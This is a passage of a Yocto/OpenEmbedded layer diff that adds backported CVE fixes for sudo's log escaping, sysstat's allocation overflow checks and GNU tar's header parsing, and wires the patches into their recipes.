411- len += sizeof(LL_CWD_STR) + 2 + strlen(user_cwd);
412- if (runas_pw != NULL)
413- len += sizeof(LL_USER_STR) + 2 + strlen(runas_pw->pw_name);
414- if (runas_gr != NULL)
415- len += sizeof(LL_GROUP_STR) + 2 + strlen(runas_gr->gr_name);
416- if (tsid != NULL)
417- len += sizeof(LL_TSID_STR) + 2 + strlen(tsid);
418- if (sudo_user.env_vars != NULL) {
419- size_t evlen = 0;
420- char * const *ep;
421-
422- for (ep = sudo_user.env_vars; *ep != NULL; ep++)
423- evlen += strlen(*ep) + 1;
424- if (evlen != 0) {
425- if ((evstr = malloc(evlen)) == NULL)
426- goto oom;
427- evstr[0] = '\0';
428- for (ep = sudo_user.env_vars; *ep != NULL; ep++) {
429- strlcat(evstr, *ep, evlen);
430- strlcat(evstr, " ", evlen); /* NOTE: last one will fail */
431- }
432- len += sizeof(LL_ENV_STR) + 2 + evlen;
433- }
434- }
435- if (user_cmnd != NULL) {
436- /* Note: we log "sudo -l command arg ..." as "list command arg ..." */
437- len += sizeof(LL_CMND_STR) - 1 + strlen(user_cmnd);
438- if (ISSET(sudo_mode, MODE_CHECK))
439- len += sizeof("list ") - 1;
440- if (user_args != NULL)
441- len += strlen(user_args) + 1;
442- }
443-
444- /*
445- * Allocate and build up the line.
446- */
447- if ((line = malloc(++len)) == NULL)
448- goto oom;
449- line[0] = '\0';
450
451 if (message != NULL) {
452- if (strlcat(line, message, len) >= len ||
453- strlcat(line, errstr ? " : " : " ; ", len) >= len)
454- goto toobig;
455+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s%s", message,
456+ errstr ? " : " : " ; ");
457 }
458 if (errstr != NULL) {
459- if (strlcat(line, errstr, len) >= len ||
460- strlcat(line, " ; ", len) >= len)
461- goto toobig;
462- }
463- if (strlcat(line, LL_TTY_STR, len) >= len ||
464- strlcat(line, user_tty, len) >= len ||
465- strlcat(line, " ; ", len) >= len)
466- goto toobig;
467- if (strlcat(line, LL_CWD_STR, len) >= len ||
468- strlcat(line, user_cwd, len) >= len ||
469- strlcat(line, " ; ", len) >= len)
470- goto toobig;
471+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s ; ", errstr);
472+ }
473+ if (user_tty != NULL) {
474+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", user_tty);
475+ }
476+ if (user_cwd != NULL) {
477+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "PWD=%s ; ", user_cwd);
478+ }
479 if (runas_pw != NULL) {
480- if (strlcat(line, LL_USER_STR, len) >= len ||
481- strlcat(line, runas_pw->pw_name, len) >= len ||
482- strlcat(line, " ; ", len) >= len)
483- goto toobig;
484+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "USER=%s ; ",
485+ runas_pw->pw_name);
486 }
487 if (runas_gr != NULL) {
488- if (strlcat(line, LL_GROUP_STR, len) >= len ||
489- strlcat(line, runas_gr->gr_name, len) >= len ||
490- strlcat(line, " ; ", len) >= len)
491- goto toobig;
492+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
493+ runas_gr->gr_name);
494 }
495 if (tsid != NULL) {
496- if (strlcat(line, LL_TSID_STR, len) >= len ||
497- strlcat(line, tsid, len) >= len ||
498- strlcat(line, " ; ", len) >= len)
499- goto toobig;
500- }
501- if (evstr != NULL) {
502- if (strlcat(line, LL_ENV_STR, len) >= len ||
503- strlcat(line, evstr, len) >= len ||
504- strlcat(line, " ; ", len) >= len)
505- goto toobig;
506- free(evstr);
507- evstr = NULL;
508+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", tsid);
509+ }
510+ if (sudo_user.env_vars != NULL) {
511+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "ENV=%s", sudo_user.env_vars[0]);
512+ for (i = 1; sudo_user.env_vars[i] != NULL; i++) {
513+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
514+ sudo_user.env_vars[i]);
515+ }
516 }
517 if (user_cmnd != NULL) {
518- if (strlcat(line, LL_CMND_STR, len) >= len)
519- goto toobig;
520- if (ISSET(sudo_mode, MODE_CHECK) && strlcat(line, "list ", len) >= len)
521- goto toobig;
522- if (strlcat(line, user_cmnd, len) >= len)
523- goto toobig;
524+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,
525+ "COMMAND=%s", user_cmnd);
526 if (user_args != NULL) {
527- if (strlcat(line, " ", len) >= len ||
528- strlcat(line, user_args, len) >= len)
529- goto toobig;
530+ sudo_lbuf_append_esc(&lbuf,
531+ LBUF_ESC_CNTRL|LBUF_ESC_QUOTE,
532+ " %s", user_args);
533 }
534 }
535
536- debug_return_str(line);
537-oom:
538- free(evstr);
539+ if (!sudo_lbuf_error(&lbuf))
540+ debug_return_str(lbuf.buf);
541+
542+ sudo_lbuf_destroy(&lbuf);
543 sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
544 debug_return_str(NULL);
545-toobig:
546- free(evstr);
547- free(line);
548- sudo_warnx(U_("internal error, %s overflow"), __func__);
549- debug_return_str(NULL);
550 }
551--- a/plugins/sudoers/sudoreplay.c
552+++ b/plugins/sudoers/sudoreplay.c
553@@ -71,6 +71,7 @@
554 #include "sudo_conf.h"
555 #include "sudo_debug.h"
556 #include "sudo_event.h"
557+#include "sudo_lbuf.h"
558 #include "sudo_util.h"
559
560 #ifdef HAVE_GETOPT_LONG
561@@ -1353,7 +1354,8 @@ match_expr(struct search_node_list *head
562 }
563
564 static int
565-list_session(char *logfile, regex_t *re, const char *user, const char *tty)
566+list_session(struct sudo_lbuf *lbuf, char *logfile, regex_t *re,
567+ const char *user, const char *tty)
568 {
569 char idbuf[7], *idstr, *cp;
570 const char *timestr;
571@@ -1386,16 +1388,32 @@ list_session(char *logfile, regex_t *re,
572 }
573 /* XXX - print rows + cols? */
574 timestr = get_timestr(li->tstamp, 1);
575- printf("%s : %s : TTY=%s ; CWD=%s ; USER=%s ; ",
576- timestr ? timestr : "invalid date",
577- li->user, li->tty, li->cwd, li->runas_user);
578- if (li->runas_group)
579- printf("GROUP=%s ; ", li->runas_group);
580- printf("TSID=%s ; COMMAND=%s\n", idstr, li->cmd);
581-
582- ret = 0;
583-
584+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "%s : %s : ",
585+ timestr ? timestr : "invalid date", li->user);
586+ if (li->tty != NULL) {
587+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ",
588+ li->tty);
589+ }
590+ if (li->cwd != NULL) {
591+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "CWD=%s ; ",
592+ li->cwd);
593+ }
594+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", li->runas_user);
595+ if (li->runas_group != NULL) {
596+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
597+ li->runas_group);
598+ }
599+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", idstr);
600+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "COMMAND=%s",
601+ li->cmd);
602+
603+ if (!sudo_lbuf_error(lbuf)) {
604+ puts(lbuf->buf);
605+ ret = 0;
606+ }
607 done:
608+ lbuf->error = 0;
609+ lbuf->len = 0;
610 free_log_info(li);
611 debug_return_int(ret);
612 }
613@@ -1415,6 +1433,7 @@ find_sessions(const char *dir, regex_t *
614 DIR *d;
615 struct dirent *dp;
616 struct stat sb;
617+ struct sudo_lbuf lbuf;
618 size_t sdlen, sessions_len = 0, sessions_size = 0;
619 unsigned int i;
620 int len;
621@@ -1426,6 +1445,8 @@ find_sessions(const char *dir, regex_t *
622 #endif
623 debug_decl(find_sessions, SUDO_DEBUG_UTIL)
624
625+ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
626+
627 d = opendir(dir);
628 if (d == NULL)
629 sudo_fatal(U_("unable to open %s"), dir);
630@@ -1485,7 +1506,7 @@ find_sessions(const char *dir, regex_t *
631
632 /* Check for dir with a log file. */
633 if (lstat(pathbuf, &sb) == 0 && S_ISREG(sb.st_mode)) {
634- list_session(pathbuf, re, user, tty);
635+ list_session(&lbuf, pathbuf, re, user, tty);
636 } else {
637 /* Strip off "/log" and recurse if a dir. */
638 pathbuf[sdlen + len - 4] = '\0';
639@@ -1496,6 +1517,7 @@ find_sessions(const char *dir, regex_t *
640 }
641 free(sessions);
642 }
643+ sudo_lbuf_destroy(&lbuf);
644
645 debug_return_int(0);
646 }
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
new file mode 100644
index 0000000000..d021873b70
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
@@ -0,0 +1,26 @@
1Backport of:
2
3From 12648b4e0a8cf486480442efd52f0e0b6cab6e8b Mon Sep 17 00:00:00 2001
4From: "Todd C. Miller" <Todd.Miller@sudo.ws>
5Date: Mon, 13 Mar 2023 08:04:32 -0600
6Subject: [PATCH] Add missing " ; " separator between environment variables and
7 command. This is a regression introduced in sudo 1.9.13. GitHub issue #254.
8
9Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-2.patch?h=ubuntu/focal-security
10Upstream commit https://github.com/sudo-project/sudo/commit/12648b4e0a8cf486480442efd52f0e0b6cab6e8b]
11CVE: CVE-2023-28486 CVE-2023-28487
12Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
13---
14 lib/eventlog/eventlog.c | 1 +
15 1 file changed, 1 insertion(+)
16
17--- a/plugins/sudoers/logging.c
18+++ b/plugins/sudoers/logging.c
19@@ -1018,6 +1018,7 @@ new_logline(const char *message, const c
20 sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
21 sudo_user.env_vars[i]);
22 }
23+ sudo_lbuf_append(&lbuf, " ; ");
24 }
25 if (user_cmnd != NULL) {
26 sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,
diff --git a/meta/recipes-extended/sudo/sudo_1.8.32.bb b/meta/recipes-extended/sudo/sudo_1.8.32.bb
index 8d16ec2538..e35bbfa789 100644
--- a/meta/recipes-extended/sudo/sudo_1.8.32.bb
+++ b/meta/recipes-extended/sudo/sudo_1.8.32.bb
@@ -4,6 +4,10 @@ SRC_URI = "https://www.sudo.ws/dist/sudo-${PV}.tar.gz \
4 ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \ 4 ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
5 file://0001-Include-sys-types.h-for-id_t-definition.patch \ 5 file://0001-Include-sys-types.h-for-id_t-definition.patch \
6 file://0001-Fix-includes-when-building-with-musl.patch \ 6 file://0001-Fix-includes-when-building-with-musl.patch \
7 file://CVE-2022-43995.patch \
8 file://CVE-2023-22809.patch \
9 file://CVE-2023-28486_CVE-2023-28487-1.patch \
10 file://CVE-2023-28486_CVE-2023-28487-2.patch \
7 " 11 "
8 12
9PAM_SRC_URI = "file://sudo.pam" 13PAM_SRC_URI = "file://sudo.pam"
diff --git a/meta/recipes-extended/sysklogd/sysklogd.inc b/meta/recipes-extended/sysklogd/sysklogd.inc
index 8899daa1b0..e45b256bbe 100644
--- a/meta/recipes-extended/sysklogd/sysklogd.inc
+++ b/meta/recipes-extended/sysklogd/sysklogd.inc
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \
10 10
11inherit update-rc.d update-alternatives systemd autotools 11inherit update-rc.d update-alternatives systemd autotools
12 12
13SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \ 13SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \
14 file://sysklogd \ 14 file://sysklogd \
15 file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \ 15 file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \
16 " 16 "
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
new file mode 100644
index 0000000000..972cc8938b
--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
@@ -0,0 +1,92 @@
1From 9c4eaf150662ad40607923389d4519bc83b93540 Mon Sep 17 00:00:00 2001
2From: Sebastien <seb@fedora-2.home>
3Date: Sat, 15 Oct 2022 14:24:22 +0200
4Subject: [PATCH] Fix size_t overflow in sa_common.c (GHSL-2022-074)
5
6allocate_structures function located in sa_common.c insufficiently
7checks bounds before arithmetic multiplication allowing for an
8overflow in the size allocated for the buffer representing system
9activities.
10
11This patch checks that the post-multiplied value is not greater than
12UINT_MAX.
13
14Signed-off-by: Sebastien <seb@fedora-2.home>
15
16Upstream-Status: Backport [https://github.com/sysstat/sysstat/commit/9c4eaf150662ad40607923389d4519bc83b93540]
17CVE : CVE-2022-39377
18Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
19---
20 common.c | 25 +++++++++++++++++++++++++
21 common.h | 2 ++
22 sa_common.c | 6 ++++++
23 3 files changed, 33 insertions(+)
24
25diff --git a/common.c b/common.c
26index ddfe75d..28d475e 100644
27--- a/common.c
28+++ b/common.c
29@@ -1528,4 +1528,29 @@ int parse_values(char *strargv, unsigned char bitmap[], int max_val, const char
30
31 return 0;
32 }
33+
34+/*
35+ ***************************************************************************
36+ * Check if the multiplication of the 3 values may be greater than UINT_MAX.
37+ *
38+ * IN:
39+ * @val1 First value.
40+ * @val2 Second value.
41+ * @val3 Third value.
42+ ***************************************************************************
43+ */
44+void check_overflow(size_t val1, size_t val2, size_t val3)
45+{
46+ if ((unsigned long long) val1 *
47+ (unsigned long long) val2 *
48+ (unsigned long long) val3 > UINT_MAX) {
49+#ifdef DEBUG
50+ fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
51+ __FUNCTION__,
52+ (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
53+#endif
54+ exit(4);
55+ }
56+}
57+
58 #endif /* SOURCE_SADC undefined */
59diff --git a/common.h b/common.h
60index 86905ba..75f837a 100644
61--- a/common.h
62+++ b/common.h
63@@ -249,6 +249,8 @@ int get_wwnid_from_pretty
64 (char *, unsigned long long *, unsigned int *);
65
66 #ifndef SOURCE_SADC
67+void check_overflow
68+ (size_t, size_t, size_t);
69 int count_bits
70 (void *, int);
71 int count_csvalues
72diff --git a/sa_common.c b/sa_common.c
73index 8a03099..ff90c1f 100644
74--- a/sa_common.c
75+++ b/sa_common.c
76@@ -452,7 +452,13 @@ void allocate_structures(struct activity *act[])
77 int i, j;
78
79 for (i = 0; i < NR_ACT; i++) {
80+
81 if (act[i]->nr_ini > 0) {
82+
83+ /* Look for a possible overflow */
84+ check_overflow((size_t) act[i]->msize, (size_t) act[i]->nr_ini,
85+ (size_t) act[i]->nr2);
86+
87 for (j = 0; j < 3; j++) {
88 SREALLOC(act[i]->buf[j], void,
89 (size_t) act[i]->msize * (size_t) act[i]->nr_ini * (size_t) act[i]->nr2);
90--
912.25.1
92
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
new file mode 100644
index 0000000000..9a27945a8b
--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
@@ -0,0 +1,46 @@
1Origin: https://github.com/opencontainers/runc/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
2Reviewed-by: Sylvain Beucler <beuc@debian.org>
3Last-Update: 2023-02-18
4
5From 954ff2e2673cef48f0ed44668c466eab041db387 Mon Sep 17 00:00:00 2001
6From: Pavel Kopylov <pkopylov@cloudlinux.com>
7Date: Wed, 17 May 2023 11:33:45 +0200
8Subject: [PATCH] Fix an overflow which is still possible for some values.
9
10CVE: CVE-2023-33204
11Upstream-Status: Backport [ upstream: https://github.com/sysstat/sysstat/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
12debian: http://security.debian.org/debian-security/pool/updates/main/s/sysstat/sysstat_12.0.3-2+deb10u2.debian.tar.xz ]
13Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
14
15---
16 common.c | 7 +++++--
17 1 file changed, 5 insertions(+), 2 deletions(-)
18
19Index: sysstat-12.0.3/common.c
20===================================================================
21--- sysstat-12.0.3.orig/common.c
22+++ sysstat-12.0.3/common.c
23@@ -1449,15 +1449,16 @@ int parse_values(char *strargv, unsigned
24 */
25 void check_overflow(size_t val1, size_t val2, size_t val3)
26 {
27- if ((unsigned long long) val1 *
28- (unsigned long long) val2 *
29- (unsigned long long) val3 > UINT_MAX) {
30+ if ((val1 != 0) && (val2 != 0) && (val3 != 0) &&
31+ (((unsigned long long) UINT_MAX / (unsigned long long) val1 <
32+ (unsigned long long) val2) ||
33+ ((unsigned long long) UINT_MAX / ((unsigned long long) val1 * (unsigned long long) val2) <
34+ (unsigned long long) val3))) {
35 #ifdef DEBUG
36- fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
37- __FUNCTION__,
38- (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
39+ fprintf(stderr, "%s: Overflow detected (%u,%u,%u). Aborting...\n",
40+ __FUNCTION__, val1, val2, val3);
41 #endif
42- exit(4);
43+ exit(4);
44 }
45 }
46
diff --git a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
index 2a90f89d25..ac7b898db9 100644
--- a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
+++ b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
@@ -2,7 +2,10 @@ require sysstat.inc
2 2
3LIC_FILES_CHKSUM = "file://COPYING;md5=a23a74b3f4caf9616230789d94217acb" 3LIC_FILES_CHKSUM = "file://COPYING;md5=a23a74b3f4caf9616230789d94217acb"
4 4
5SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch" 5SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch \
6 file://CVE-2022-39377.patch \
7 file://CVE-2023-33204.patch \
8 "
6 9
7SRC_URI[md5sum] = "9dfff5fac24e35bd92fb7896debf2ffb" 10SRC_URI[md5sum] = "9dfff5fac24e35bd92fb7896debf2ffb"
8SRC_URI[sha256sum] = "8edb0e19b514ac560a098a02933a4735b881296d61014db89bf80f05dd7a4732" 11SRC_URI[sha256sum] = "8edb0e19b514ac560a098a02933a4735b881296d61014db89bf80f05dd7a4732"
diff --git a/meta/recipes-extended/tar/tar/CVE-2021-20193.patch b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
new file mode 100644
index 0000000000..89e8e20844
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
@@ -0,0 +1,133 @@
1From d9d4435692150fa8ff68e1b1a473d187cc3fd777 Mon Sep 17 00:00:00 2001
2From: Sergey Poznyakoff <gray@gnu.org>
3Date: Sun, 17 Jan 2021 20:41:11 +0200
4Subject: Fix memory leak in read_header
5
6Bug reported in https://savannah.gnu.org/bugs/?59897
7
8* src/list.c (read_header): Don't return directly from the loop.
9Instead set the status and break. Return the status. Free
10next_long_name and next_long_link before returning.
11
12CVE: CVE-2021-20193
13Upstream-Status: Backport
14[https://git.savannah.gnu.org/cgit/tar.git/patch/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777]
15Signed-off-by: Anatol Belski <anbelski@linux.microsoft.com>
16
17---
18 src/list.c | 40 ++++++++++++++++++++++++++++------------
19 1 file changed, 28 insertions(+), 12 deletions(-)
20
21diff --git a/src/list.c b/src/list.c
22index e40a5c8..d7ef441 100644
23--- a/src/list.c
24+++ b/src/list.c
25@@ -408,26 +408,27 @@ read_header (union block **return_block, struct tar_stat_info *info,
26 enum read_header_mode mode)
27 {
28 union block *header;
29- union block *header_copy;
30 char *bp;
31 union block *data_block;
32 size_t size, written;
33- union block *next_long_name = 0;
34- union block *next_long_link = 0;
35+ union block *next_long_name = NULL;
36+ union block *next_long_link = NULL;
37 size_t next_long_name_blocks = 0;
38 size_t next_long_link_blocks = 0;
39-
40+ enum read_header status = HEADER_SUCCESS;
41+
42 while (1)
43 {
44- enum read_header status;
45-
46 header = find_next_block ();
47 *return_block = header;
48 if (!header)
49- return HEADER_END_OF_FILE;
50+ {
51+ status = HEADER_END_OF_FILE;
52+ break;
53+ }
54
55 if ((status = tar_checksum (header, false)) != HEADER_SUCCESS)
56- return status;
57+ break;
58
59 /* Good block. Decode file size and return. */
60
61@@ -437,7 +438,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
62 {
63 info->stat.st_size = OFF_FROM_HEADER (header->header.size);
64 if (info->stat.st_size < 0)
65- return HEADER_FAILURE;
66+ {
67+ status = HEADER_FAILURE;
68+ break;
69+ }
70 }
71
72 if (header->header.typeflag == GNUTYPE_LONGNAME
73@@ -447,10 +451,14 @@ read_header (union block **return_block, struct tar_stat_info *info,
74 || header->header.typeflag == SOLARIS_XHDTYPE)
75 {
76 if (mode == read_header_x_raw)
77- return HEADER_SUCCESS_EXTENDED;
78+ {
79+ status = HEADER_SUCCESS_EXTENDED;
80+ break;
81+ }
82 else if (header->header.typeflag == GNUTYPE_LONGNAME
83 || header->header.typeflag == GNUTYPE_LONGLINK)
84 {
85+ union block *header_copy;
86 size_t name_size = info->stat.st_size;
87 size_t n = name_size % BLOCKSIZE;
88 size = name_size + BLOCKSIZE;
89@@ -517,7 +525,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
90 xheader_decode_global (&xhdr);
91 xheader_destroy (&xhdr);
92 if (mode == read_header_x_global)
93- return HEADER_SUCCESS_EXTENDED;
94+ {
95+ status = HEADER_SUCCESS_EXTENDED;
96+ break;
97+ }
98 }
99
100 /* Loop! */
101@@ -536,6 +547,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
102 name = next_long_name->buffer + BLOCKSIZE;
103 recent_long_name = next_long_name;
104 recent_long_name_blocks = next_long_name_blocks;
105+ next_long_name = NULL;
106 }
107 else
108 {
109@@ -567,6 +579,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
110 name = next_long_link->buffer + BLOCKSIZE;
111 recent_long_link = next_long_link;
112 recent_long_link_blocks = next_long_link_blocks;
113+ next_long_link = NULL;
114 }
115 else
116 {
117@@ -578,9 +591,12 @@ read_header (union block **return_block, struct tar_stat_info *info,
118 }
119 assign_string (&info->link_name, name);
120
121- return HEADER_SUCCESS;
122+ break;
123 }
124 }
125+ free (next_long_name);
126+ free (next_long_link);
127+ return status;
128 }
129
130 #define ISOCTAL(c) ((c)>='0'&&(c)<='7')
131--
132cgit v1.2.1
133
diff --git a/meta/recipes-extended/tar/tar/CVE-2022-48303.patch b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
new file mode 100644
index 0000000000..b2f40f3e64
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
@@ -0,0 +1,43 @@
1From 3da78400eafcccb97e2f2fd4b227ea40d794ede8 Mon Sep 17 00:00:00 2001
2From: Sergey Poznyakoff <gray@gnu.org>
3Date: Sat, 11 Feb 2023 11:57:39 +0200
4Subject: Fix boundary checking in base-256 decoder
5
6* src/list.c (from_header): Base-256 encoding is at least 2 bytes
7long.
8
9Upstream-Status: Backport [see reference below]
10CVE: CVE-2022-48303
11
12Reference to upstream patch:
13https://savannah.gnu.org/bugs/?62387
14https://git.savannah.gnu.org/cgit/tar.git/patch/src/list.c?id=3da78400eafcccb97e2f2fd4b227ea40d794ede8
15
16Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
17Signed-off-by: Joe Slater <joe.slater@windriver.com>
18---
19 src/list.c | 5 +++--
20 1 file changed, 3 insertions(+), 2 deletions(-)Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
21
22
23(limited to 'src/list.c')
24
25diff --git a/src/list.c b/src/list.c
26index 9fafc42..86bcfdd 100644
27--- a/src/list.c
28+++ b/src/list.c
29@@ -881,8 +881,9 @@ from_header (char const *where0, size_t digs, char const *type,
30 where++;
31 }
32 }
33- else if (*where == '\200' /* positive base-256 */
34- || *where == '\377' /* negative base-256 */)
35+ else if (where <= lim - 2
36+ && (*where == '\200' /* positive base-256 */
37+ || *where == '\377' /* negative base-256 */))
38 {
39 /* Parse base-256 output. A nonnegative number N is
40 represented as (256**DIGS)/2 + N; a negative number -N is
41--
42cgit v1.1
43
diff --git a/meta/recipes-extended/tar/tar/CVE-2023-39804.patch b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
new file mode 100644
index 0000000000..f550928540
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
@@ -0,0 +1,64 @@
1From a339f05cd269013fa133d2f148d73f6f7d4247e4 Mon Sep 17 00:00:00 2001
2From: Sergey Poznyakoff <gray@gnu.org>
3Date: Sat, 28 Aug 2021 16:02:12 +0300
4Subject: Fix handling of extended header prefixes
5
6* src/xheader.c (locate_handler): Recognize prefix keywords only
7when followed by a dot.
8(xattr_decoder): Use xmalloc/xstrdup instead of alloc
9
10Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4]
11CVE: CVE-2023-39804
12Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
13---
14 src/xheader.c | 17 +++++++++--------
15 1 file changed, 9 insertions(+), 8 deletions(-)
16
17diff --git a/src/xheader.c b/src/xheader.c
18index 4f8b2b2..3cd694d 100644
19--- a/src/xheader.c
20+++ b/src/xheader.c
21@@ -637,11 +637,11 @@ static struct xhdr_tab const *
22 locate_handler (char const *keyword)
23 {
24 struct xhdr_tab const *p;
25-
26 for (p = xhdr_tab; p->keyword; p++)
27 if (p->prefix)
28 {
29- if (strncmp (p->keyword, keyword, strlen(p->keyword)) == 0)
30+ size_t kwlen = strlen (p->keyword);
31+ if (keyword[kwlen] == '.' && strncmp (p->keyword, keyword, kwlen) == 0)
32 return p;
33 }
34 else
35@@ -1716,19 +1716,20 @@ xattr_decoder (struct tar_stat_info *st,
36 char const *keyword, char const *arg, size_t size)
37 {
38 char *xstr, *xkey;
39-
40+
41 /* copy keyword */
42- size_t klen_raw = strlen (keyword);
43- xkey = alloca (klen_raw + 1);
44- memcpy (xkey, keyword, klen_raw + 1) /* including null-terminating */;
45+ xkey = xstrdup (keyword);
46
47 /* copy value */
48- xstr = alloca (size + 1);
49+ xstr = xmalloc (size + 1);
50 memcpy (xstr, arg, size + 1); /* separator included, for GNU tar '\n' */;
51
52 xattr_decode_keyword (xkey);
53
54- xheader_xattr_add (st, xkey + strlen("SCHILY.xattr."), xstr, size);
55+ xheader_xattr_add (st, xkey + strlen ("SCHILY.xattr."), xstr, size);
56+
57+ free (xkey);
58+ free (xstr);
59 }
60
61 static void
62--
63cgit v1.1
64
diff --git a/meta/recipes-extended/tar/tar_1.32.bb b/meta/recipes-extended/tar/tar_1.32.bb
index ebe6cb0dbd..9297480e85 100644
--- a/meta/recipes-extended/tar/tar_1.32.bb
+++ b/meta/recipes-extended/tar/tar_1.32.bb
@@ -6,8 +6,13 @@ SECTION = "base"
6LICENSE = "GPLv3" 6LICENSE = "GPLv3"
7LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" 7LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
8 8
9PR = "r1"
10
9SRC_URI = "${GNU_MIRROR}/tar/tar-${PV}.tar.bz2 \ 11SRC_URI = "${GNU_MIRROR}/tar/tar-${PV}.tar.bz2 \
10 file://musl_dirent.patch \ 12 file://musl_dirent.patch \
13 file://CVE-2021-20193.patch \
14 file://CVE-2022-48303.patch \
15 file://CVE-2023-39804.patch \
11" 16"
12 17
13SRC_URI[md5sum] = "17917356fff5cb4bd3cd5a6c3e727b05" 18SRC_URI[md5sum] = "17917356fff5cb4bd3cd5a6c3e727b05"
@@ -64,3 +69,7 @@ PROVIDES_append_class-native = " tar-replacement-native"
64NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}" 69NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}"
65 70
66BBCLASSEXTEND = "native nativesdk" 71BBCLASSEXTEND = "native nativesdk"
72
73# Avoid false positives from CVEs in node-tar package
74# For example CVE-2021-{32803,32804,37701,37712,37713}
75CVE_PRODUCT = "gnu:tar"
diff --git a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
index ec04bfe390..a942ac2991 100644
--- a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
+++ b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Fake version of the texinfo utility suite" 1SUMMARY = "Fake version of the texinfo utility suite"
2SECTION = "console/utils" 2SECTION = "console/utils"
3DESCRIPTION = "${SUMMARY}"
3LICENSE = "MIT" 4LICENSE = "MIT"
